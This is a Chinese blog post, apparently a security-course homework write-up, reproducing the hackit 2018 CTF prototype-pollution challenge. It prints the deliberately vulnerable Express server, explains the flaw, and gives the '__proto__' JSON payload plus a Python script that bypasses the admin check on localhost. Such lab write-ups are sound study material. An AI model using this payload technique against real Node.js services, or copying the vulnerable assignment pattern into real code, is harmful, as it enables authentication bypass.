网安第三次作业

已于 2023-08-03 20:50:30 修改
阅读量82 收藏
点赞数
文章标签: javascript 开发语言 ecmascript
于 2023-08-03 20:49:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59049258/article/details/132090362
版权

目录

一、复现原型链污染漏洞

hackit 2018

1、创建hackit_2018.js文件

2、运行hackit_2018.js文件

3、寻找原型链漏洞 

4、污染原型链

二、沙箱逃逸漏洞

一、复现原型链污染漏洞

hackit 2018

1、创建hackit_2018.js文件
const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}

function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})
2、运行hackit_2018.js文件

3、寻找原型链漏洞 
app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}

如果想要成功进入函数内部,就需要满足以下条件

user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken

user.admintoken和md5(user.admintoken)需要等于 req.query.querytoken

user为一个空数组,寻找user的读写方法

4、污染原型链

 

 这段代码 client通过request请求获得我们传入的值,我们通过传入的值来控制原型对象的值

{"row":"__proto__","col":"admintoken","data":"sunsec"}

将这一段代码上传之后

matrix[client.row][client.col] = client.data;

matrix["__proto__"]["admintoken"] = "sunsec";

matrix.__proto__.admintoken=sunsec

这三段代码表示的意思一致

 所以matrix的原型对象增加了admintoken这一属性

user和admin均为数组,他们的原型对象一致,表示user也获得了admintoken这一属性

user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken

这时候根据之前的思路编写代码污染原型链

通过访问/api污染原型链,访问·/admin上传原型链data对应值的MD5校验值

import requests
import json
url1 = "http://127.0.0.1:3000/api"
url2 = "http://127.0.0.1:3000/admin?querytoken=a3c23537bfc1e2da4a511661547d65fb"
s = requests.session()
headers = { "Content-Type" : "application/json" }
data1 = { "row": "__proto__", "col" : "admintoken" , "data" : "sunsec"}
res1 = s.post(url1,headers=headers,data = json.dumps(data1))
res2 = s.get(url2)
print(res2.text)

运行js文件

 运行python脚本

 成功绕过

二、沙箱逃逸漏洞

暂时没写

m0_59049258
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【愚公系列】2023年06月 网络安全(交通银行杯)-找flag
时光隧道
05-25 8253
Wireshark(前称Ethereal)是一个网络数据包分析软件。网络数据包分析软件的功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据。在过去,网络数据包分析软件是非常昂贵,或是专门属于营利用的软件,Wireshark的出现改变了这一切。在GNU通用公共许可证的保障范围底下,用户可以以免费的代价获取软件与其代码,并拥有针对其源代码修改及定制化的权利。Wireshark是目前全世界最广泛的网络数据包分析软件之一。
周玉川-2017221302006-网安技术第三次作业1
08-03
- **中间人攻击**:在Needham-Schroeder协议的第三步,即当A向B发送消息时,如果中间人截获了这条消息并伪装成B向A发送了一个格式相同的随机数,那么A使用与B共享的密钥Kab对这个新消息进行解密,相当于进行了加密...
网安招新题
qq_73824705的博客
11-19 1475
网安招新赛的简单题
CTF利用大佬们的webshell拿取flag
Javachichi的博客
04-27 621
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。这份完整版的网络安全(黑客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接即可前往获取【保证100%免费】。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。学习黑客常用的开发软件都在这里了,给大家节省了很多时间。比较早的一场CTF了,做了几个web。而upload最为显著了,发现存在目录遍历。
0x00.基础漏洞篇
weixin_43263566的博客
05-10 1046
0x00.基础漏洞篇
周玉川-2017221302006-网安技术第七次作业1
08-08
周玉川同学的第七次作业主要探讨了入侵检测的分类、主要技术指标以及未知攻击检测方法,并提出了一个实践性的课后练习。 1. 入侵检测的分类: - 异常检测模型(Anomaly Detection):这种模型依赖于对正常行为的...
周玉川-2017221302006-网安技术第四次作业1
08-08
例如,一个三位的二进制数可以表示用户对文件的访问权限,000—111 即 0-7,按位分别表示 R,W,X,1 代表有权限,0 代表无。 在 Windows 的域模式下,访问控制是基于域控制器的验证和授权的。域控制器负责控制用户...
周玉川-2017221302006-网安技术第六次作业1
08-08
(2)实现包过滤几乎不再需要费用 (3)包过滤路由器对用户和应用来说是透明的 (2)只能阻止一种类型的IP欺骗 (3)任何直接经过路由器的数据包都有被用作数据驱
周玉川-2017221302006-网安技术第二次作业1
08-08
3、 TCP协议安全威胁产生的根本原因是什么 4、 UDP协议安全威胁产生的根本原因是什么 5、域名解析协议中主要存在哪些安全威胁
ECMAScript性能优化技巧与陷阱:深入探索与实践
最新发布
Chujun123528的博客
08-15 650
ECMAScript性能优化是一个复杂而细致的过程,需要开发者从多个角度进行考虑和优化。通过合理利用现代JavaScript特性、优化DOM操作、选择合适的算法和数据结构、利用Web Workers等技术手段,可以显著提升JavaScript代码的执行效率。同时,开发者还需要关注全局变量、闭包、eval等性能陷阱,避免不必要的性能开销。此外,性能监控与分析、内存管理、网络层面的优化等也是不可忽视的重要方面。只有综合考虑这些因素,并持续进行性能优化工作,才能为用户提供更加流畅、高效的Web应用体验。
vue3使用pnpm运行项目但是运行不起来
一个努力不被优化的程序员
08-12 192
重新创建项目,将老项目的package.json,vite.config.ts,src等文件拖拽替换。删除node_modules重新下:文字编译乱码,utf-8可能解析处理问题。(如果哪位知道为什么会这样或者怎么解决麻烦留言下)运行项目的时候发现根本运行不起来了。删除node_modules重新下。尝试过创建.npmr文件。创建.npmr:不管用。
提升前端性能的JavaScript技巧
han2434的博客
08-14 707
一个快速响应、高效运行的Web页面不仅能提升用户体验,还能在一定程度上影响网站的SEO排名。本文汇总了一系列JavaScript技巧,以帮助开发者提升前端性能,并提供实际的代码示例。
Electron学习与总结
song854601134的博客
08-12 214
组成,‌其中Chromium负责渲染和显示Web页面,‌而Node.js则提供了主进程的功能,‌包括管理应用程序的生命周期、‌创建和控制浏览器窗口以及与操作系统交互。,‌Electron使得开发者能够保持JavaScript代码库的一致性,‌从而轻松地创建跨平台的应用程序,‌而无需具备本地开发经验。Electron的核心是由。
display:flex布局,最简单的案例
有问题可关注公众号:前端研究院 后台输入问题回复
08-12 204
【代码】display:flex布局,最简单的案例。
vue 3d echarts scatter3D元素塌陷,图标塌陷进地图完美解决方案
creatlh的博客
08-12 185
当我们手机用 scatter3D 类型时,最小值因为渲染问题会塌陷进模型里面,所以只要让value固定,再将label formatter 配合 boxHeight属性即可解决,(代码附带自定义label图标解决办法)
playwright链接本地浏览器,实现自动登录。
qq_38880880的博客
08-12 158
【代码】playwright链接本地浏览器,实现自动登录。
【无标题】
weixin_42348009的博客
08-14 121
静态方法返回一个由给定对象自身的可枚举的字符串键属性名组成的数组。
Vue2 axios
qq_53374893的博客
08-14 115
说明一下, 当前服务器 有资源 就不会走代理服务器了,直接返回当前资源 而且只能代理一个服务器.
【Markdown】Markdown 中的语言简称
EleganceJiaBao的博客
08-12 925
以下是常见编程语言、脚本语言、标记语言等在 Markdown 中的语言简称以及相应的示例:
github网安项目
04-24
3. Snort:Snort是一个开源的入侵检测系统(IDS),它可以监测网络流量并检测潜在的攻击行为。Snort的代码托管在GitHub上,开发者可以参与到项目中,改进和定制自己的IDS规则。 4. Nmap:Nmap是一个网络扫描和主机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值